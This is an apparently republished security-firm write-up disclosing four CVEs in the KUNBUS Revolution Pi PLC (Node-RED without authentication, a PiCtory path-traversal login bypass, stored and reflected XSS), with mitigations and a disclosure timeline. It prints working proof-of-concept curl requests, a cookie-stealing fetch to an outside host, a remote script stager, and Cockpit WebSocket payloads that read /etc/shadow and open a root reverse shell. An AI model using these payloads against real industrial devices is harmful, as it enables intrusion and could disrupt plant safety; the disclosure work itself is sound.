\n<\/p>\n
### TL;DR<\/p>\n
* Four new vulnerabilities in the Revolution Pi industrial PLCs
* Two give unauthenticated attackers RCE\u2014potentially a direct impact on safety and operations
* Documentation and firmware is public, meaning greater oversight and better security in the long run
* KUNBUS\u2019 PSIRT and CISA were great at coordinating disclosure<\/p>\n
### Introduction<\/p>\n
The Revolution Pi is a programmable logic controller (PLC) made by KUNBUS Gmbh.<\/p>\n
PLCs are ruggedised devices sitting near the lowest layer of an industrial network. They use simple I\/O and fieldbus protocols to control field devices (valves, actuators, etc.) and monitor processes.<\/p>\n
The Revolution Pi is unique in that the documentation is public and KUNBUS encourage OS-level customisation. The firmware is also publicly accessible.<\/p>\n
We found four vulnerabilities by downloading and extracting Revolution Pi\u2019s latest firmware version (01\/2025). We didn\u2019t even need to buy the device, although one would look great on our ICS demo rig! All were found with static code analysis but demonstrated by installing the firmware to a standard Raspberry Pi.<\/p>\n
Three concerned PiCtory, a bespoke interface for configuring the Revolution Pi\u2019s digital I\/O and expansion modules:<\/p>\n
<\/p>\n
The fourth was an insecure default configuration of Node-RED, a flow-based visual programming interface for controlling the I\/O.<\/p>\n
CISA and KUNBUS have released official advisories:<\/p>\n
* ICSA-25-121-01
* Kunbus-2025-0000001
* Kunbus-2025-0000002<\/p>\n
### Attack paths<\/p>\n
Several high-impact attack paths are possible as an unauthenticated remote attacker:<\/p>\n
* Code execution on Node-RED as the low-privilege nodered user (CVE-2025-24522).
* Authentication bypass (CVE-2025-32011) on PiCtory to control the PLC\u2019s digital I\/O and extension modules.
* Using the authentication bypass to upload a stored XSS payload to PiCtory (CVE-2025-35996). This can leverage an existing Cockpit session to execute code as the root user.
* Coercing a victim to click on a malicious PiCtory URL (CVE-2025-36558) that can also gain code execution via Cockpit.<\/p>\n
### CVE-2025-24522: Lack of Authentication in Revolution Pi Node-RED<\/p>\n
**CVSS:** 9.3 (Critical), CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N
**CVSS:** 10.0 (Critical), CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H
**Product:** Revolution Pi OS Bookworm
**Vulnerable Version:** Versions 01\/2025 (250124) and earlier<\/p>\n
#### Description<\/p>\n
Authentication is not configured by default on the Node-RED server. An unauthenticated remote attacker has administrative access to the server and can run arbitrary commands on the underlying operating system, which includes affecting the PLC\u2019s I\/O.<\/p>\n
#### Detailed analysis<\/p>\n
Revolution Pi runs a Node-RED server for low-code development of programs that interface with its input-output pins. The server is exposed on TCP port 41880.<\/p>\n
Node-RED supports authentication, but the instance installed on Revolution Pi\u2019s stock image does not configure it. There is also no guidance or warning to users in Revolution Pi\u2019s documentation.<\/p>\n
In addition to programming the device\u2019s input-output pins, a remote unauthenticated attacker can create a flow to run arbitrary operating system commands as the nodered user.<\/p>\n
<\/p>\n
### CVE-2025-32011 – Authentication Bypass in Revolution Pi PiCtory<\/p>\n
**CVSS:** 9.3 (Critical), CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N
**CVSS:** 9.8 (Critical), CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H
**Product:** PiCtory
**Vulnerable Version:** Versions 2.5.0 through 2.11.1, included as a part of Revolution Pi OS Bookworm 01\/2025 (250124) and earlier<\/p>\n
#### Description<\/p>\n
Authentication bypass vulnerability in the PiCtory web application used by Revolution Pi. A remote attacker can authenticate to the application without valid credentials due to a path-traversal vulnerability. This grants control over the Revolution Pi\u2019s I\/O terminals and expansion modules but could also be chained with CVE-2025-35996 for RCE.<\/p>\n
#### Detailed analysis<\/p>\n
Access to PiCtory is intended to be granted via the Cockpit management service instead of the user navigating directly to the application.<\/p>\n
A user logged into Cockpit creates a token that gets sent to the PiCtory login handler (_php\/sso_login.php_). The token is a file created by the _\/usr\/share\/cockpit\/revpi-config\/scripts\/create_sso_token.sh_ script, which the Cockpit application spawns as a process on request by the Cockpit user. The file is created in _\/run\/cockpit-revpi-pictory-sso\/_ and named with a random UUID.<\/p>\n
To authenticate a user, _sso_login.php_ simply checks if the token file path (provided in the sso_token query parameter) exists.<\/p>\n
For example:<\/p>\n
1. User logs into Cockpit at _https:\/\/local_ _\/_
2. User requests access to PiCtory
3. Cockpit runs _sh_ , creating _\/run\/cockpit-revpi-pictory-sso\/47079ccb-6c33-44ab-8562-aa8cc022f12f_
4. User is redirected to _https:\/\/RevPi.local\/pictory\/php\/sso_login.php?sso_token=47079ccb-6c33-44ab-8562-aa8cc022f12f_
5. _php_ checks if _\/run\/cockpit-revpi-pictory-sso\/47079ccb-6c33-44ab-8562-aa8cc022f12f_ exists
6. If true, it creates a PHP session with the RevPiSessionId variable, which is used for authentication to all other PiCtory functionality<\/p>\n
Step (5) is vulnerable to path traversal: the file path is insecurely constructed by blindly appending sso_token to the run directory path:<\/p>\n
**(**…**)**
$sso_token = $_GET[‘sso_token’];
$sso_token_directory = “\/run\/cockpit-revpi-pictory-sso”;
$sso_file_path = $sso_token_directory . “\/” . $sso_token;<\/p>\n
_\/\/ Check if sso file exists_
if (!file_exists($sso_file_path)) {
http_response_code(401);
echo “No SSO file found for token ” . $sso_token;
exit;
}<\/p>\n
_\/\/ Read content of the file_
$content = file_get_contents($sso_file_path);
$content_array = explode(“\\n”, $content); _\/\/ split string by newline_
$username = $content_array[0]; _\/\/ the first and currently only line is the username_<\/p>\n
_\/\/ Webstatus login session stored the MD5 of the PHP SessionId_
$revPiSessionId = md5(session_id());
_\/\/ And the JS would then use this hash to set a cookie with this name_
_\/\/ In webstatus the value of the cookie is a incorrectly implemented JWT Token which is actually never read_
setcookie(‘KUNBUS_RevPiSessionId_’ . $revPiSessionId, $revPiSessionId, 0, ‘\/’);
_\/\/ pictory ignores the actual value completelly and only checks if this id was stored in the session_
$_SESSION[‘RevPiSessionId’] = $revPiSessionId;<\/p>\n
_\/\/ Mark session as authenticated via SSO_
$_SESSION[“sso_logged_in”] = true;
$_SESSION[“username”] = $username;<\/p>\n
_\/\/ Set SSO cookie to let PiCtory know that it has been started from within cockpit_
setcookie(‘Cockpit_SSO_Host’, ‘cockpit_sso_host’, 0, ‘\/’);<\/p>\n
_\/\/ delete the token after session was created_
unlink($sso_file_path);<\/p>\n
redirectToPictory($revPiSessionId);
**(**…**)**<\/p>\n
Providing a blank sso_token makes the application check if _\/run\/cockpit-revpi-pictory-sso\/_ exists, which always returns true and will authenticate the user:<\/p>\n
**attacker@ptp$ curl –insecure –include –get \\**
**–data ‘ sso_token=invalid_token’ \\**
**’https:\/\/RevPi.local:41443\/pictory\/php\/sso_login.php’**
HTTP\/1.1 401 Unauthorized
Date: Wed, 19 Feb 2025 16:26:33 GMT
Server: Apache\/2.4.62 (Debian)
X-Frame-Options: SAMEORIGIN
Set-Cookie: PHPSESSID=itlh3tj87bi6c6sdr3fo4egcmk; path=\/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 41
Content-Type: text\/html; charset=UTF-8<\/p>\n
No SSO file found for token invalid-token<\/p>\n
**attacker@ptp$ curl –insecure –include –get \\**
**–data ‘ sso_token=’ \\**
**’https:\/\/RevPi.local:41443\/pictory\/php\/sso_login.php’**
HTTP\/1.1 302 Found
Date: Wed, 19 Feb 2025 16:26:37 GMT
Server: Apache\/2.4.62 (Debian)
X-Frame-Options: SAMEORIGIN
Set-Cookie: PHPSESSID=2hekf5u60ft87u26rpsqa7fja4; path=\/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: KUNBUS_RevPiSessionId_3b765f2a75718dd885cfd81635447d74=3b765f2a75718dd885cfd81635447d74; path=\/
Set-Cookie: Cockpit_SSO_Host=cockpit_sso_host; path=\/
Location: \/pictory\/index.html?hn=3b765f2a75718dd885cfd81635447d74
Content-Length: 12
Content-Type: text\/html; charset=UTF-8<\/p>\n
redirect …<\/p>\n
**sso_token** could also be any other existing file path, such as _..\/..\/var\/www\/revpi\/pictory\/_. The path traversal is restricted by PHP\u2019s open_basedir directive to: _\/run\/cockpit-revpi-pictory-sso_ , _\/usr\/bin\/piControlReset_ , _\/usr\/bin\/sudo_ , and _\/var\/www\/revpi\/pictory_.<\/p>\n
As well as access to PiCtory, _sso_login.php_ deletes the token file using unlink() resulting in an arbitrary file deletion vulnerability.<\/p>\n
The username session variable is set to the first line of the file. This could constitute an arbitrary file read but unfortunately the variable is never outputted by PiCtory.<\/p>\n
### CVE-2025-35996 – Stored Cross-Site Scripting in Revolution Pi PiCtory<\/p>\n
**CVSS:** 8.5 (High), CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:A\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N
**CVSS:** 9.0 (Critical), CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:H\/I:H\/A:H
**Product:** PiCtory
**Vulnerable Version:** Versions 2.11.1 and earlier, included as a part of Revolution Pi OS Bookworm 01\/2025 (250124) and earlier.<\/p>\n
#### Description<\/p>\n
Stored cross-site scripting is possible in the PiCtory web application via specially crafted filenames in the _export\/_ and _projects\/_ directories. This is due to insufficient output encoding and sanitisation of input parameters. An authenticated remote attacker can inject arbitrary scripts into the application\u2019s _index.html_ , which can result in session hijacking when viewed by another user.<\/p>\n
Since Revolution Pi runs PiCtory and Cockpit on the same site, the exploit may also be used to steal the user\u2019s Cockpit session and run arbitrary operating system commands as the root user to gain full control over the PLC.<\/p>\n
#### Detailed analysis<\/p>\n
PiCtory has a function that shows a user a list of configuration files in the _export\/_ , _projects\/_ , and _resources\/data\/rap\/_ directories. The user can upload to the first two directories.<\/p>\n
The functionality is in _php\/getFileList.php_ :<\/p>\n
**(…)**
foreach($result as $r)
if (file_exists($r))
echo substr($r,2).”,”.date (“Y|m|d|H|i|s”, filemtime($r)).”;”;
**(…)**<\/p>\n
PiCtory fails to encode the output of the filename ($r). An authenticated attacker can create a project file with HTML tags in its name, which is subsequently rendered as HTML code when displayed to users.<\/p>\n
The tags can be used to run arbitrary JavaScript and perform actions authenticated as the victim, such as modify or delete their PiCtory project files.<\/p>\n
A benign proof of concept is shown below:<\/p>\n
**attacker@ptp$ curl \\**
**–insecure \\**
**–cookie ‘PHPSESSID=mjgrujmnp9ipjlnatube642c5g’ \\**
**–data ‘{}’ \\**
**’https:\/\/revpi.local:41443\/pictory\/php\/saveProject.php?fn= .rsc&RevPiSessionId=3576b803c263d70c556178c073bed4d3’**
OK<\/p>\nWhich creates the following file on the system:<\/p>\n
**pi@RevPi$ ls -l \/var\/www\/revpi\/pictory\/projects\/**
total 20
-rw-r–r– 1 www-data www-data 1293 Feb 19 17:00\u00a0 _config.rsc
-rw-r–r– 1 www-data www-data\u00a0\u00a0\u00a0 2 Feb 19 17:27 ‘
.rsc’
-rw-r–r– 1 www-data www-data 1671 Feb 19 17:09\u00a0 pictory_configcheck.log
-rw-r–r– 1 root\u00a0\u00a0\u00a0\u00a0 root\u00a0\u00a0\u00a0\u00a0\u00a0 706 Jan 23 09:49\u00a0 _README.txt
-rw-r–r– 1 root\u00a0\u00a0\u00a0\u00a0 root\u00a0\u00a0\u00a0\u00a0\u00a0 334 Jan 23 09:49\u00a0 _userSettings.json<\/p>\n
And executes the payload whenever viewed in the file list:<\/p>\n
<\/p>\n
<\/p>\n
Neither of the authentication cookies are set with the HttpOnly attribute, so the script can exfiltrate them to the attacker-controlled server and fully hijack a user\u2019s session:<\/p>\n
fetch(“https:\/\/pentestpartners.com\/” + document.cookie)<\/p>\n
However, the most impactful exploit leverages the fact that PiCtory and Cockpit run under different directories on the same site: https:\/\/RevPi.local:41443\/ and https:\/\/RevPi.local:41443\/pictory\/.<\/p>\n
This means the XSS payload can send requests with Cockpit\u2019s session cookie. Cockpit allows you to run commands as the root user, so the XSS can execute code on the operating system.<\/p>\n
This attack involves more complexity, so the initial payload is a stager for a larger script hosted on the attacker\u2019s server:<\/p>\n
s=document.createElement(‘script’);s.src=’https:\/\/attacker.local\/xss.js’;document.head.appendChild(s);<\/p>\n
Since the payload is stored in a filename on the Revolution Pi, it cannot contain forward slashes so was Base64-encoded and wrapped in eval(atob()) to be executed:<\/p>\n
**attacker@ptp$ curl \\**
**–insecure \\**
**–cookie ‘PHPSESSID=mjgrujmnp9ipjlnatube642c5g’ \\**
**–data ‘{}’ \\**
**’https:\/\/revpi.local:41443\/pictory\/php\/saveProject.php?fn= .rsc&RevPiSessionId=75c1f3f2cfe12a9788029c4a99d93045’**
OK<\/p>\nIt looks like this when injected:<\/p>\n
<\/p>\n
The script at _https:\/\/attacker.local\/xxs.js_ invokes a WebSocket session with Cockpit. Two scripts were made to demonstrate impact. The first simply shows the groups of the operating system user that ran the Cockpit commands, and demonstrates privilege escalation to root by viewing _\/etc\/shadow_ :<\/p>\n
socket = new WebSocket(‘wss:\/\/revpi.local:41443\/cockpit-revpi\/cockpit\/socket’);<\/p>\n
socket.addEventListener(‘open’, () => {
socket.send(‘\\n{“command”:”init”,”version”:1}’);
socket.send(‘\\n{“payload”:”stream”,”spawn”:[“id”],”command”:”open”,”channel”:”1!1″}’);
socket.send(‘\\n{“payload”:”stream”,”spawn”:[“id<\"],\"command\":\"open\",\"channel\":\"1!2\",\"superuser\":\"try\"}');
socket.send(‘\\n{“payload”:”stream”,”spawn”:[“cat”,”\/etc\/shadow”],”command”:”open”,”channel”:”1!3″,”superuser”:”try”}’);
});<\/p>\n
socket.addEventListener(‘message’, (event) => event.data.startsWith(“1!”) ? console.log(event.data) : 0);<\/p>\n
<\/p>\n
The second spawns a reverse shell back to an attacker\u2019s server over the network, granting them a full interactive session on the Revolution Pi as the root user:<\/p>\n
socket = new WebSocket(‘wss:\/\/RevPi.local:41443\/cockpit-revpi\/cockpit\/socket’);<\/p>\n
socket.addEventListener(‘open’, () => {
socket.send(‘\\n{“command”:”init”,”version”:1}’);
socket.send(‘\\n{“payload”:”stream”,”spawn”:[“bash”,”-c”,”bash -i >&\/dev\/tcp\/192.168.0.1\/1337 0>&1″],”command”:”open”,”channel”:”1!1″,”superuser”:”try”}’);<\/p>\n
});<\/p>\n
<\/p>\n
Ultimately this code execution allows an attacker to control the PLC\u2019s digital I\/O and expansion modules. This could be used to disrupt plant operations and pose a safety or financial impact.<\/p>\n
### CVE-2025-36558 – Reflected Cross-Site Scripting in PiCtory<\/p>\n
**CVSS:** 5.1 (Medium), CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:A\/VC:L\/VI:L\/VA:N\/SC:N\/SI:N\/SA:N
**CVSS:** 6.1 (Medium), CVSS:3.1AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:L\/I:L\/A:N
**Product:** PiCtory
**Vulnerable Version:** Versions 2.11.1 and earlier, included as a part of Revolution Pi OS Bookworm 01\/2025 (250124) and earlier.<\/p>\n
#### Description<\/p>\n
Reflected cross-site scripting in PiCtory via the sso_token query string parameter. This is due to insufficient output encoding and sanitisation of input parameters. A malicious URL could inject and execute arbitrary JavaScript in an authenticated user\u2019s browser, which could result in session hijacking.<\/p>\n
#### Detailed analysis<\/p>\n
_php\/sso_login.php_ in PiCtory authenticates the user with a token provided in the sso_token query string parameter.<\/p>\n
An invalid token is outputted in the server\u2019s response. HTML character entities are not used to encode the output, meaning the browser attempts to render any HTML code embedded in the value.<\/p>\n
**(…)**
$sso_token = $_GET[‘sso_token’];
$sso_token_directory = “\/run\/cockpit-revpi-pictory-sso”;
$sso_file_path = $sso_token_directory . “\/” . $sso_token;<\/p>\n
_\/\/ Check if sso file exists_
if (!file_exists($sso_file_path)) {
http_response_code(401);
echo “No SSO file found for token ” . $sso_token;
exit;
}
**(…)**<\/p>\n
A URL with a token containing a script element causes the browser to execute the script when navigated to, e.g.:<\/p>\n
https:\/\/revpi.local:41443\/pictory\/php\/sso_login.php?sso_token=%3Cscript%3Ealert(document.domain)%3C\/script%3E<\/p>\n
<\/p>\n
Like the stored XSS, an attacker can steal the user\u2019s PiCtory or Cockpit sessions and gain code execution. However, the likelihood is significantly less since a successful attack relies on an administrator of the PLC being coerced into following the URL at the time of being connected to the plant\u2019s control network.<\/p>\n
### Mitigations<\/p>\n
Set a username and password for Node-RED in _\/var\/lib\/revpi-nodered\/.node-red\/settings.js_ (further details in KUNBUS\u2019 advisory). Disable Node-RED if unused.<\/p>\n
Upgrade PiCtory to version 2.12 with **sudo apt update && sudo apt upgrade** on the Revolution Pi\u2019s command line. This version will also be shipped with the next full OS image (04\/2025).<\/p>\n
As is always the guidance with ICS environments: practice good segregation in line with ISA\/IEC 62443, the Purdue model, and other standards. Be worried if the baddies are reaching your PLCs!<\/p>\n
### Disclosure timeline<\/p>\n
Since the vulnerabilities affect ICS equipment, we coordinated disclosure with CISA and KUNBUS\u2019 PSIRT team (security.txt).<\/p>\n
There were some teething issues, mainly down to KUNBUS not having an account on VINCE (CERT\/CC\u2019s disclosure environment) and there being disjointed communications until everyone was present. But remediation was achieved within 90 days:<\/p>\n
* **21 st February 2025: **Initial contact with KUNBUS\u2019 PSIRT.
* **24 th February 2025: **KUNBUS response and full disclosure document is shared.
* **27 th February 2025: **Case is opened in VINCE with Pen Test Partners and CISA \/ Idaho National Laboratory. CISA attempt contact with KUNBUS.
* **24 th March 2025:** KUNBUS chased by Pen Test Partners over email.
* **31 st March 2025: **KUNBUS confirm no invite received from CISA.
* **1 st April 2025:** KUNBUS unexpectedly publish advisory to their own website.
* **4 th April 2025:** Remediation is reviewed and approved by Pen Test Partners.
* **8 th April 2025: **KUNBUS join VINCE and confirm CISA\u2019s initial contact was sent to the wrong address.
* **1 st May 2025:** CISA publish advisory alongside four CVEs.
* **8 th May 2025:** Pen Test Partners publish writeup.<\/p>\n
The post RCEs and more in the KUNBUS GmbH Revolution Pi PLC first appeared on Pen Test Partners.\n<\/p><\/div>\n
View Advisory Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Security Update News Update Information Title RCEs and more in the KUNBUS GmbH Revolution Pi PLC Update ID PENTESTPARTNERS:3E4E7F7EA8A3B882725E1415D8315308 Type pentestpartners Published 2025-05-08T05:36:30 Last Updated…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[9,6,8,55,12,13,134,7,11,5],"class_list":["post-3566","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-pentestpartners","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=3566\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Security Update News Update Information Title RCEs and more in the KUNBUS GmbH Revolution Pi PLC Update ID PENTESTPARTNERS:3E4E7F7EA8A3B882725E1415D8315308 Type pentestpartners Published 2025-05-08T05:36:30 Last Updated...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=3566\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-08T03:35:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"RCEs and more in the KUNBUS GmbH Revolution Pi PLC\",\"datePublished\":\"2025-05-08T03:35:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566\"},\"wordCount\":2708,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"pentestpartners\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3566#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566\",\"name\":\"RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-08T03:35:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3566\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3566#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"RCEs and more in the KUNBUS GmbH Revolution Pi PLC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=3566","og_locale":"en_US","og_type":"article","og_title":"RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem","og_description":"Security Update News Update Information Title RCEs and more in the KUNBUS GmbH Revolution Pi PLC Update ID PENTESTPARTNERS:3E4E7F7EA8A3B882725E1415D8315308 Type pentestpartners Published 2025-05-08T05:36:30 Last Updated...","og_url":"https:\/\/zero.redgem.net\/?p=3566","og_site_name":"zero redgem","article_published_time":"2025-05-08T03:35:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=3566#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=3566"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"RCEs and more in the KUNBUS GmbH Revolution Pi PLC","datePublished":"2025-05-08T03:35:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=3566"},"wordCount":2708,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","pentestpartners","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=3566#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=3566","url":"https:\/\/zero.redgem.net\/?p=3566","name":"RCEs and more in the KUNBUS GmbH Revolution Pi PLC - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-08T03:35:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=3566#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=3566"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=3566#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"RCEs and more in the KUNBUS GmbH Revolution Pi PLC"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3566","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3566"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3566\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/in